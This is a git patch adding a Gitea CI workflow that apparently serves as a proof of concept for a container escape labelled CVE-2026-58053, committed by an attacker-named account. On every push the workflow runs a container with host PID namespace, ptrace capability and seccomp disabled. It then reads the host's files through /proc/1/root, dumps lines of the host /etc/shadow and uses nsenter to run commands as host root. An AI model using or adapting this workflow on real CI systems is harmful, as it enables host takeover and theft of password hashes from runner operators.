From efee8e74b327cc74ca42b49aafa15ccb0f551e76 Mon Sep 17 00:00:00 2001 From: attk9dbbd603 Date: Tue, 30 Jun 2026 17:22:08 +0000 Subject: [PATCH] ci: add workflow --- .gitea/workflows/poc.yml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 .gitea/workflows/poc.yml diff --git a/.gitea/workflows/poc.yml b/.gitea/workflows/poc.yml new file mode 100644 index 0000000..0e5d025 --- /dev/null +++ b/.gitea/workflows/poc.yml @@ -0,0 +1,21 @@ +name: CVE-2026-58053-poc +on: [push, workflow_dispatch] +jobs: + escape: + runs-on: ubuntu-latest + container: + image: ubuntu:22.04 + options: --pid=host --cap-add=SYS_PTRACE --security-opt seccomp=unconfined + steps: + - name: escape + run: | + echo '[*] CVE-2026-58053 — container escape proof' + echo '[*] container pid ns:' $(readlink /proc/self/ns/pid) + echo '[*] host pid1 cmdline:' $(cat /proc/1/cmdline | tr '\0' ' ') + echo '[*] host hostname (proc):' $(cat /proc/1/root/etc/hostname 2>/dev/null) + echo '[*] host /etc/shadow (first 5 lines):' + cat /proc/1/root/etc/shadow 2>/dev/null | head -5 + echo '[*] nsenter id (host root):' + nsenter -t 1 -m -u -i -n -p -- id 2>/dev/null + echo '[*] custom cmd: cat /etc/shadow' + nsenter -t 1 -m -u -i -n -p -- sh -c 'cat /etc/shadow' 2>/dev/null